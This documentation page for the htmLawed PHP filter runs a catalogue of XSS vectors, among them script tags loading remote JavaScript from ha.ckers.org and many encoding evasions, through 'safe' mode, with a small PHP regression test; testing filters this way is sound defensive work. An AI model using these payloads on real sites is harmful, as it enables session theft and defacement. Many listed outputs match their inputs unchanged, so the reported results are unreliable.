To illustrate the anti-XSS efficiency of htmLawed in 'safe' mode, htmLawed was used to filter the text of each XSS vector (code) listed on RSnake's XSS cheat sheet (31 January 2009 version; an updated version may be available). For each vector, the code is shown both before and after filtering. Most vectors obviously designed to exploit HTML markup in the <head> section or in <frame>, <noframe>, or <frameset> elements of web pages, or those targeting non-HTML content such as Flash movies, PHP interpreters, etc., were not considered, as those are outside htmLawed's purview. How htmLawed neutralizes text (e.g., '>' can be removed or converted to an HTML entity) can vary depending on the settings used.
The 'safe' mode means that the $config parameter 'safe' is set to 1, and no other parameters are specified that would over-ride the default parameter values implicitly used because of 'safe'. In such cases,
'safe'=>1
is thus equivalent to the following in a $config value:
'comments'=>0,
'cdata'=>0, 'deny_attribute'=>'on*',
'elements'=>'* -applet -audio -canvas -embed -iframe -object -script -video',
'schemes'=>'href: aim, feed, file, ftp, gopher, http, https, irc, mailto, news, nntp, sftp, ssh, tel, telnet; style: !; *:file, http, https'
Refer to the htmLawed documentation for more about $config.
Note: Security concerns when filtering HTML are defined by many parameters, such as how much a user is trusted or what an administrator requires. htmLawed is an HTML filter/processor, not an anti-XSS tool per se. For instance, the mere presence of Javascript code or dynamic CSS expressions in HTML does not mean that the HTML is dangerous. htmLawed certainly can be used with the right settings to remove such HTML code, as shown in the examples below. On this site you can also find more test-cases with XSS or bad HTML code, as well as an htmLawed demo page. There is also a demo page to test just the anti-XSS ability of htmLawed (in safe mode, with the style attribute denied).
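An added regression check (written for this page, not htmLawed's own code) that runs three of the vectors listed below through htmLawed once with 'safe'=>1 and once with the expanded $config above, then compares both results with the output this page reports for those vectors. It assumes htmLawed.php is on the include path and that the htmLawed version matches the one used to produce the listed results.

```php
<?php
// Added example, not part of htmLawed: verifies the 'safe'=>1 equivalence
// stated above and checks the filter output against the results listed on
// this page. Assumes htmLawed.php (the library) is on the include path and
// that its version matches the one used for the listed outputs.
require_once 'htmLawed.php';

$safe = array('safe' => 1);

// The explicit equivalent of 'safe'=>1, as given on this page
$explicit = array(
    'comments'       => 0,
    'cdata'          => 0,
    'deny_attribute' => 'on*',
    'elements'       => '* -applet -audio -canvas -embed -iframe -object -script -video',
    'schemes'        => 'href: aim, feed, file, ftp, gopher, http, https, irc, mailto, '
                      . 'news, nntp, sftp, ssh, tel, telnet; style: !; *:file, http, https',
);

// Vectors 6, 10 and 11 from the list below, with the output this page lists
$cases = array(
    '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">'
        => '<div style="background-image: url(denied:javascript:alert(\'XSS\'))"></div>',
    '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">'
        => '<input type="image" src="denied:javascript:alert(\'XSS\');" />',
    '<IMG SRC="javascript:alert(\'XSS\');">'
        => '<img src="denied:javascript:alert(\'XSS\');" alt="image" />',
);

$failures = 0;
foreach ($cases as $input => $expected) {
    $viaSafe     = htmLawed($input, $safe);
    $viaExplicit = htmLawed($input, $explicit);

    // 1. 'safe'=>1 and its expansion must produce identical output
    if ($viaSafe !== $viaExplicit) {
        $failures++;
        echo "CONFIG MISMATCH for: $input\n";
    }
    // 2. the output must match what this page lists (catches version drift)
    if ($viaSafe !== $expected) {
        $failures++;
        echo "OUTPUT DIFFERS for: $input\n  got:      $viaSafe\n  expected: $expected\n";
    }
}
echo $failures ? "$failures problem(s) found\n" : "all cases filtered as listed\n";
exit($failures ? 1 : 0);
```

A non-zero exit status means either the two configurations diverged or the installed htmLawed no longer produces the outputs listed here, which is the signal to re-review the filter settings.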
1. XSS Locator (Category: Basic XSS Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2. XSS Quick Test (Category: Basic XSS Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »'';!--"<XSS>=&{()}
Output code »'';!--"<XSS>=&{()}
3. SCRIPT w/Alert() (Category: Basic XSS Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>alert('XSS')</SCRIPT>
Output code »<SCRIPT>alert('XSS')</SCRIPT>
4. SCRIPT w/Source File (Category: Basic XSS Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Output code »<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
5. SCRIPT w/Char Code (Category: Basic XSS Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
6. DIV background-image 1 (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
7. DIV background-image 2 (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
8. DIV expression (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="width: expression(alert('XSS'));">
Output code »<div style="width: (alert('XSS'));"></div>
9. IFRAME (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Output code »<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
10. INPUT Image (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Output code »<input type="image" src="denied:javascript:alert('XSS');" />
11. IMG w/JavaScript Directive (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="javascript:alert('XSS');">
Output code »<img src="denied:javascript:alert('XSS');" alt="image" />
12. IMG No Quotes/Semicolon (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert('XSS')>
Output code »<img src="denied:javascript:alert(" alt="image" />
13. IMG Dynsrc (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG DYNSRC="javascript:alert('XSS');">
Output code »<img src="src" alt="image" />
14. IMG Lowsrc (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG LOWSRC="javascript:alert('XSS');">
Output code »<img src="src" alt="image" />
15. IMG Embedded commands 1 (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Output code »<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
16. IMG Embedded commands 2 (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Output code »Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
17. IMG STYLE w/expression (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
Output code »exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
18. IMG w/VBscript (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC='vbscript:msgbox("XSS")'>
Output code »<img src="denied:vbscript:msgbox("XSS")" alt="image" />
19. LAYER (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Output code »<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
20. Livescript (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<IMG SRC="livescript:[code]">
Output code »<img src="denied:livescript:[code]" alt="image" />
*21. US-ASCII encoding (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Output code »%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
22. Mocha (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<IMG SRC="mocha:[code]">
Output code »<img src="denied:mocha:[code]" alt="image" />
23. OBJECT (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Output code »<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
24. OBJECT w/Embedded XSS (Category: HTML Element Attacks)
Browser support:
Input code »<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
Output code »<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
25. Embed Flash (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Output code »<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
*26. OBJECT w/Flash 2 (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";¬
eval(a+b+c+d);
Output code »a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";¬
eval(a+b+c+d);
27. STYLE (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Output code »<style type="text/javascript" scoped="scoped">alert('XSS');</style>
28. STYLE w/Comment (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Output code »<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
29. STYLE w/Anonymous HTML (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XSS STYLE="xss:expression(alert('XSS'))">
Output code »<XSS STYLE="xss:expression(alert('XSS'))">
30. TABLE (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
Output code »<table></table>
31. TD (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
Output code »<table><td></td></table>
32. XML namespace (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
Output code »<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
33. XML data island w/CDATA (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
Output code »<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><span></span>
34. XML data island w/comment (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>¬
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Output code »<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>¬
<span></span>
35. XML (locally hosted) (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Output code »<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<span></span>
36. XML HTML+TIME (Category: HTML Element Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
Output code »<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
37. Commented-out Block (Category: Other Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
Output code »<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
38. Rename .js to .jpg (Category: Other Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Output code »<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
39. SSI (Category: Other Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Output code »<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
40. PHP (Category: Other Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>
Output code »<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>
41. JavaScript Includes (Category: Other Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<BR SIZE="&{alert('XSS')}">
Output code »<br />
42. Case Insensitive (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=JaVaScRiPt:alert('XSS')>
Output code »<img src="denied:JaVaScRiPt:alert(" alt="image" />
43. HTML Entities (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert("XSS")>
Output code »<img src="denied:javascript:alert("XSS")" alt="image" />
44. Grave Accents (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Output code »<img src="denied:`javascript:alert(" alt="image" />
45. Image w/CharCode (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Output code »<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
46. UTF-8 Unicode Encoding (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert('XSS')>
Output code »<img src="denied:javascript:alert('XSS')" alt="image" />
47. Long UTF-8 Unicode w/out Semicolons (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert('XSS')>
Output code »<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041" alt="image" />
48. DIV w/Unicode (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Output code »<div style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029' 029"></div>
49. Hex Encoding w/out Semicolons (Category: Character Encoding Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert('XSS')>
Output code »<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29" alt="image" />
50. Embedded Tab (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav ascript:alert('XSS');">
Output code »<img src="denied:jav ascript:alert('XSS');" alt="image" />
51. Embedded Encoded Tab (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav	ascript:alert('XSS');">
Output code »<img src="denied:jav	ascript:alert('XSS');" alt="image" />
52. Embedded Newline (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav
ascript:alert('XSS');">
Output code »<img src="denied:jav
ascript:alert('XSS');" alt="image" />
53. Embedded Carriage Return (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav
ascript:alert('XSS');">
Output code »<img src="denied:jav
ascript:alert('XSS');" alt="image" />
54. Multiline w/Carriage Returns (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG¬
SRC¬
=¬
"¬
j¬
a¬
v¬
a¬
s¬
c¬
r¬
i¬
p¬
t¬
:¬
a¬
l¬
e¬
r¬
t¬
(¬
'¬
X¬
S¬
S¬
'¬
)¬
"¬
>
Output code »<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
55. Spaces/Meta Chars (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="  javascript:alert('XSS');">
Output code »<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
56. Non-Alpha/Non-Digit (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
57. Non-Alpha/Non-Digit Part 2 (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Output code »<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
58. No Closing Script Tag (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC=http://ha.ckers.org/xss.js
Output code »<SCRIPT SRC=http://ha.ckers.org/xss.js
59. Protocol resolution in script tags (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC=//ha.ckers.org/.j>
Output code »<SCRIPT SRC=//ha.ckers.org/.j>
60. Half-Open HTML/JavaScript (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="javascript:alert('XSS')"
Output code »<IMG SRC="javascript:alert('XSS')"
61. Double open angle brackets (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Output code »<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
62. Extraneous Open Brackets (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<<SCRIPT>alert("XSS");//<</SCRIPT>
Output code »<<SCRIPT>alert("XSS");//<</SCRIPT>
63. Malformed IMG Tags (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Output code »<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
64. No Quotes/Semicolons (Category: Embedded Character Attacks)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>
Output code »<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>
65. Evade Regex Filter 1 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
66. Evade Regex Filter 2 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
67. Evade Regex Filter 3 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
68. Evade Regex Filter 4 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
69. Evade Regex Filter 5 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
70. Filter Evasion 1 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
71. Filter Evasion 2 (Category: XSS w/HTML Quote Encapsulation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
72. Mixed Encoding (Category: URL Obfuscation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<A HREF="h¬
tt p://6	6.000146.0x7.147/">XSS</A>
Output code »<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
73. JavaScript Link Location (Category: URL Obfuscation)
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Output code »<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>